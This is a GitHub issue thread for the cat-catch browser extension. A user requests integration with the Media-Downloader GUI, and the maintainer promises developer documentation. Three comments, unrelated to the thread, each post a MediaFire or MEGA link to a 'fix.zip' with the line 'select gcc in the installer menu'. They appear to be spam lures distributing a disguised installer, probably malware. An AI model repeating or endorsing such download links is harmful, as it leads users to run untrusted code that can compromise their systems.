### ISSUE TITLE
Add integration with Media-Downloader the open source GUI program which provides the best graphical interface for command line download engines to make things easier for beginners and better performance

### ISSUE THREAD

**Issue by trimechee** [xifangczy/cat-catch#459]
Hello, our beloved Cat-catch has integration with command lines external downloaders like m3u8DL ,aria2c and it can be difficult for non-experts and beginners to use such downloaders engines with command line and its graphical interface, and to remedy that, there is the magnificent Media-downloader :

https://github.com/mhogomchungu/media-downloader

which offers native integration and a graphical interface and many options to download engines like yt-dlp, you get, lux, aria2c, wget....

i spoke to the great developer of Madia -downloader who kindly agreed to add the integration with a download video extension that allows us to add custom yt-dlp arguments to the detected video and we can thus send the detected video to Madia-downloader :

https://github.com/54ac/stream-detector

and I told him also and asked him to add the integration of a graphical interface to m3u8DL and other download m3u8 mpd engines and he did not refuse the idea but he told me these programs are in Chinese language and so it may be complicated to integrate them but he did not refuse my suggestion....

in short I have already spoken about Cat-catch to the developer of Media -downloader to realize our dream of adding a native integration of cat catch in media downoader as for the stream detector extension and we also hope please Cat-catch will add a native integration with Media -downloader for a better smooth download experience with beautiful GUI, thank you very much :)

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by xifangczy** [comment]
When I have time, I will write a development document for interfacing with cat-catch

**Comment by trimechee** [comment]
Awesome !!! thank you so much !! 💯 🥇 


@mhogomchungu

https://github.com/mhogomchungu/media-downloader/issues/422
